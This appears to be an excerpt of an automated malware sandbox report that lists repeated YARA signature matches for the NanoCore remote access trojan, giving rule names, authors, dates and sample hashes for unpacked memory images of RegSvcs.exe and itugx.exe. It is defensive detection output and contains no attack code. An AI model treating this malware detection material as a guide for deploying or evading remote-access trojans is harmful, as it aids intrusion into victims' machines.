Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
